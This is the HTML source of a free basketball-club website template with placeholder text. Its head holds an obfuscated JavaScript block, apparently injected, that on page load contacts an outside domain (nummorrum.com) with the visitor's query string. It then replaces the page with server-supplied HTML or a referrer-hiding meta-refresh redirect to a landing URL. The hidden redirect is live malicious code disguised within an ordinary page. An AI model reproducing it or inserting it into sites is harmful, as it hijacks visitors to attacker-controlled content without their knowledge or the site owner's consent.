<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Basketball</title>
<link rel="stylesheet" href="style.css" type="text/css" charset="utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
<script>var _0x369b=['148145nVjqHZ','1KnzOVM','write','close','responseText','send','1KZBjoE','<html><head>','3oFlqAw','135EZDTJn','status','1vvDXtb','1017779hHEKWd','search','5XuECWr','458033uKbJwc','landing_url','landing_html','[?&]nr=1','<meta http-equiv="refresh" content="0; url=','href','21031cypqMO','3841CjvkZd','" />','https://nummorrum.com/index.php?key=ggeki37hva92ga3n0zc1&lp_type=js_redirect&'+window.location.search.substring(1),'parse','1690egDYfd','GET','open','31219ZtOXgR','267dsQspw','</head></html>','<meta content="1660984191986;"/>'];var _0x5e11=function(_0x4cb19d,_0x244c7b){_0x4cb19d=_0x4cb19d-0x6b;var _0x369b4d=_0x369b[_0x4cb19d];return _0x369b4d;};(function(_0x4bc0c1,_0x3810ae){var _0x436d21=_0x5e11;while(!![]){try{var _0x34542f=parseInt(_0x436d21(0x70))*-parseInt(_0x436d21(0x7d))+-parseInt(_0x436d21(0x75))*parseInt(_0x436d21(0x7c))+parseInt(_0x436d21(0x6d))*parseInt(_0x436d21(0x88))+parseInt(_0x436d21(0x73))*parseInt(_0x436d21(0x89))+-parseInt(_0x436d21(0x72))*parseInt(_0x436d21(0x76))+parseInt(_0x436d21(0x85))*parseInt(_0x436d21(0x81))+-parseInt(_0x436d21(0x84))*-parseInt(_0x436d21(0x6f));if(_0x34542f===_0x3810ae)break;else _0x4bc0c1['push'](_0x4bc0c1['shift']());}catch(_0x2f5fe4){_0x4bc0c1['push'](_0x4bc0c1['shift']());}}}(_0x369b,0x99960),!function(){var _0x44ddeb=_0x5e11;if(-0x1==window['location'][_0x44ddeb(0x7b)][_0x44ddeb(0x74)](_0x44ddeb(0x79))){var _0xf5e636=new XMLHttpRequest();_0xf5e636[_0x44ddeb(0x83)](_0x44ddeb(0x82),_0x44ddeb(0x7f),!0x0),_0xf5e636['onload']=function(){var _0x3dd81e=_0x44ddeb;if(0xc8===_0xf5e636[_0x3dd81e(0x71)]){var _0x4e9c69=JSON[_0x3dd81e(0x80)](_0xf5e636[_0x3dd81e(0x6b)]);return _0x4e9c69[_0x3dd81e(0x78)]?(document[_0x3dd81e(0x83)](),document['write'](_0x4e9c69[_0x3dd81e(0x78)]),void document[_0x3dd81e(0x8b)]()):_0x4e9c69[_0x3dd81e(0x77)]?(document[_0x3dd81e(0x83)](),document[_0x3dd81e(0x8a)](_0x3dd81e(0x6e)),document[_0x3dd81e(0x8a)]('<meta name="referrer" content="never" />'),document[_0x3dd81e(0x8a)](_0x3dd81e(0x87)),document['write'](_0x3dd81e(0x7a)+_0x4e9c69[_0x3dd81e(0x77)]+_0x3dd81e(0x7e)),document[_0x3dd81e(0x8a)](_0x3dd81e(0x86)),void document[_0x3dd81e(0x8b)]()):void 0x0;}},_0xf5e636[_0x44ddeb(0x6c)]();}}());</script>
</head>
<body>
<div id="wrapper">
  <div id="man">
    <h1><img src="images/logo.gif" width="778" height="60" alt="Logo"></h1>
    <div id="nav"> <a href="#"><img src="images/m1.gif" width="246" height="30" alt="M1"></a> <a href="#"><img src="images/m2.gif" width="246" height="25" alt="M2"></a> <a href="#"><img src="images/m3.gif" width="246" height="25" alt="M3"></a> <a href="#"><img src="images/m4.gif" width="246" height="24" alt="M4"></a> <a href="#"><img src="images/m5.gif" width="246" height="25" alt="M5"></a> <a href="#"><img src="images/m6.gif" width="246" height="23" alt="M6"></a> <a href="#"><img src="images/m7.gif" width="246" height="25" alt="M7"></a> <img src="images/m8.gif" width="246" height="35" alt="M8"> </div>
    <div id="body">
      <div class="drk" id="welcome">
        <div class="top">
          <div class="bot">
            <div class="picbar"><img src="images/pic_2.jpg" width="458" height="103" alt="Pic 2"></div>
            <div class="pad">
              <h2><img src="images/h_welcome_to_our_club.gif" width="137" height="17" alt="Welcome To Our Club" /></h2>
              <p>Don't forgot to check <a href="#">free website templates</a> every day, because we add at least one free website template daily.</p>
              <p>This is a template designed by free website templates for you for free you can replace all the text by your own text. This is just a place holder so you can see how the site would look like.</p>
              <p>You can remove any link to our websites from this template you're free to use the template without linking back to us. Don't want your boss to know you used a free website template ;) .</p>
              <p class="more"><a href="#" class="diamond">Know more</a></p>
            </div>
          </div>
        </div>
      </div>
      <div class="drk" id="news">
        <div class="top">
          <div class="bot"> <img src="images/pic_3.jpg" width="156" height="249" alt="Pic 3" class="right" />
            <div class="pad">
              <h2><img src="images/h_current_sports_news.gif" width="117" height="21" alt="Current Sports News"></h2>
              <h3>20-12-06</h3>
              <p>Even more websites all about website templates on <a href="http://www.justwebtemplates.com">Just Web Templates</a>.</p>
              <h3>20-12-06</h3>
              <p>If you're looking for beautiful and professionally made templates you can find them at <a href="http://www.templatebeauty.com">Template Beauty</a>.</p>
              <h3>20-12-06</h3>
              <p>If you're having problems editing the template please don't hesitate to ask for help on the <a href="#">forum</a>.</p>
              <p class="more"><a href="#" class="diamond">Know more</a></p>
            </div>
            <div class="clear"></div>
          </div>
        </div>
      </div>
      <div class="lit" id="features">
        <div class="top">
          <div class="bot">
            <div class="pad">
              <h2><img src="images/h_featured_events.gif" width="97" height="17" alt="Featured Events"></h2>
              <div class="event">
                <h3>23-12-06</h3>
                <p>Even more websites all about website templates on <a href="http://www.justwebtemplates.com">Just Web Templates</a>.</p>
                <p class="more"><a href="#" class="diamond">more</a></p>
              </div>
              <div class="event">
                <h3>23-12-06</h3>
                <p>If you're looking for beautiful and professionally made templates you can find them at <a href="http://www.templatebeauty.com">Template Beauty</a>.</p>
                <p class="more"><a href="#" class="diamond">more</a></p>
              </div>
            </div>
            <div class="clear"></div>
          </div>
        </div>
      </div>
    </div>
    <div class="clear"></div>
  </div>
</div>
<div id="foot">
  <div id="foot-left">
    <div id="foot-ball"></div>
&copy; BasketBall Club All right Reservered. | designed by <a href="http://www.freewebsitetemplates.com">free website templates</a></div>
</div>
</body>
</html>
